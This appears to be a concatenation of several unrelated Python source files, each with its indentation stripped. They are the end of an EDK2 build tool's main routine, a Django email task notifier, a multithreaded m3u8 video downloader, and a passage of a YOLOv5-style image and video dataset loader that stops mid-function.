help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
(Opt, Args)=Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose != None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet != None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug != None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile != None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" %(' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" %(' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile != None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile != None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag != None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
MyBuild.Launch()
# Drop temp tables to avoid database locked.
for TmpTableName in TmpTableDict:
SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
TmpTableDict[TmpTableName].execute(SqlCommand)
#MyBuild.DumpBuildData()
except FatalError, X:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning, X:
# error from Fdf parser
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError = False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb != None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.sourceforge.net for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
Conclusion = "Done"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)"%(BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild != None:
MyBuild.BuildReport.GenerateReport(BuildDurationStr)
MyBuild.Db.Close()
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
task_notifier.py
|
import sys, datetime, threading, json
from django.utils import timezone
from django.conf import settings
from django.core.mail import send_mail
from django.template import loader
import requests
def send_email_via_trustifi(subject, html_body, recipient):
payload = {
"recipients": [
{
"email": recipient
}
],
"title": subject,
"html": html_body,
}
headers = {
'x-trustifi-key': settings.TRUSTIFI_KEY,
'x-trustifi-secret': settings.TRUSTIFI_SECRET,
'Content-Type': 'application/json'
}
response = requests.request('POST', 'https://be.trustifi.com/api/i/v1/email', headers = headers, data = json.dumps(payload))
print(response.json())
def send_task_notifications(Task):
domain = settings.BASE_URL
for task in Task.objects.filter(notified=False, due_date__lte=timezone.now()):
url = f"{domain}{task.get_absolute_url()}"
subject = f'منظام - حان آوان مهمتك "{task.name}"'
context = {'task_name': task.name, 'task_url': url}
text_body = loader.render_to_string('task_notification_body.txt', context)
html_body = loader.render_to_string('task_notification_body.html', context)
recipient = task.user.email
print(f'- sending email to "{task.user.email}" about task "{task.name}"')
if settings.USE_TRUSTIFI:
send_email_via_trustifi(subject, html_body, recipient)
else:
send_mail(subject, text_body, None, [recipient], fail_silently=False, html_message=html_body)
task.notified = True
task.save()
def run_task_notifier():
from .models import Task
exit = threading.Event()
def notify():
while True:
s = exit.wait(60)
if s:
break
exit.clear()
print(f"{datetime.datetime.now()}: sending task notifications", file=sys.stderr)
send_task_notifications(Task)
threading.Thread(target=notify).start()
|
__init__.py
|
# a multithreading m3u8 download module and the number of threads can decide by yourself
# author: walkureHHH
# last modify: 2020/06/17
import requests
from threading import Thread
from threading import Lock
import os
import shutil
from tqdm import tqdm
class thread_num_ERROR(Exception):
pass
class mod_ERROR(Exception):
pass
class m3u8_downloader:
temp_file_path = ''
mp4_path = ''
num_of_threads = ''
m3u8_file_path = ''
urls = []
names = []
has_download_name = []
cant_dow = []
total = 0
lock = Lock()
def __init__(self,m3u8_file_path,temp_file_path='.',mp4_path='./test.mp4',num_of_threads=10):
if num_of_threads <= 0:
raise thread_num_ERROR('the number of threads can\'t smaller than 0')
self.mp4_path = mp4_path
self.temp_file_path = temp_file_path
self.num_of_threads = num_of_threads
self.m3u8_file_path = m3u8_file_path
if os.path.exists(self.temp_file_path+'/TS'):
print("""warning: the temporary folder has exited\n
please comfirm the temporary folder included the fragment video you need""")
self.has_download_name = os.listdir(self.temp_file_path+'/TS')
else:
os.mkdir(self.temp_file_path+'/TS')
self.has_download_name = []
with open(self.m3u8_file_path,'r') as m3u8:
temp_url = [m3u8_lines.replace('\n','') for m3u8_lines in m3u8.readlines() if m3u8_lines.startswith('http')]
self.total = len(temp_url)
self.names = [i.split('/')[-1].split('?')[0] for i in temp_url]
self.urls = [[] for j in range(0, self.num_of_threads)]
for index, el in enumerate(temp_url):
self.urls[index%self.num_of_threads].append(el)
return
def start(self,mod = 0, time_out = 60):
if mod not in [0,1,2,3]:
raise mod_ERROR('Only have mod 0 , 1 , 2 or 3')
with tqdm(total=self.total,bar_format='<<*>> {percentage:3.0f}% {n_fmt}/{total_fmt} [{elapsed}<{remaining}] <<*>> ') as jdt:
Threads = []
for i in range(self.num_of_threads):
thread = Thread(target=self.__download, args=(self.urls[i],'thread'+str(i),jdt,time_out))
Threads.append(thread)
for threads in Threads:
threads.start()
for threads in Threads:
threads.join()
percent = '%.02f%%'%((len(self.has_download_name)/len(self.names))*100)
if len(self.has_download_name)==len(self.names):
print('downloading finished',percent)
for names in self.names:
ts = open(self.temp_file_path+'/TS/'+names,'rb')
with open(self.mp4_path,'ab') as mp4:
mp4.write(ts.read())
ts.close()
if mod == 0 or mod == 1:
os.remove(self.m3u8_file_path)
if mod == 0 or mod == 2:
shutil.rmtree(self.temp_file_path+'/TS')
else:
print('----------------------------------------------------------------')
for cantdow_urls in self.cant_dow:
print('downloading fail:',cantdow_urls)
print('incomplete downloading',percent)
def __download(self, download_list, thread_name, jdt, time_out):
for urls in download_list:
if urls.split('/')[-1].split('?')[0] not in self.has_download_name:
for i in range(0,5):
try:
conn = requests.get(urls,timeout=time_out)
if conn.status_code == 200:
with open(self.temp_file_path+'/TS/'+urls.split('/')[-1].split('?')[0],'wb') as ts:
ts.write(conn.content)
with self.lock:
if i != 0:
print('\n'+thread_name,'redownload successfully',urls.split('/')[-1].split('?')[0])
self.has_download_name.append(urls.split('/')[-1].split('?')[0])
jdt.update(1)
break
else:
with self.lock:
if i == 0:
print('\n'+thread_name,conn.status_code,urls.split('/')[-1].split('?')[0],'begin retry 1')
else:
print('\n'+thread_name,conn.status_code,urls.split('/')[-1].split('?')[0],'Retry '+ str(i) +'/3')
if i == 4:
self.cant_dow.append(urls)
except:
with self.lock:
if i == 0:
print('\n'+thread_name,'Time out ERROR',urls.split('/')[-1].split('?')[0],'begin retry 1')
else:
print('\n'+thread_name,'Time out ERROR',urls.split('/')[-1].split('?')[0],'Retry '+ str(i) +'/3')
if i == 4:
self.cant_dow.append(urls)
else:
with self.lock:
jdt.update(1)
if __name__ == "__main__":
a = m3u8_downloader('/mnt/c/Users/kylis/Downloads/r.m3u8',temp_file_path='.',mp4_path='./1.mp4', num_of_threads=17)
a.start()
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from modules.targetAcquisition.pylonDetection.utils.general import xyxy2xywh, xywh2xyxy, clean_str
from modules.targetAcquisition.pylonDetection.utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank,
image_weights=image_weights)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, auto=True):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size, auto=self.auto)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, auto=True):
self.mode = 'stream'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size, auto=self.auto)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
assert self.img_files, 'No images found'
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = Path(self.label_files[0]).parent.with_suffix('.cache') # cached labels
if cache_path.is_file():
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'results' not in cache: # changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Display cache
[nf, nm, ne, nc, n] = cache.pop('results') # found, missing, empty, corrupted, total
desc = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=desc, total=n, initial=n)
assert nf > 0 or not augment, f'No labels found in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path=Path('./labels.cache')):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape]
except Exception as e:
nc += 1
print('WARNING: Ignoring corrupted image and/or label %s: %s' % (im_file, e))
pbar.desc = f"Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = [nf, nm, ne, nc, i + 1]
torch.save(x, path) # save for next time
logging.info(f"New cache created: {path}")
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
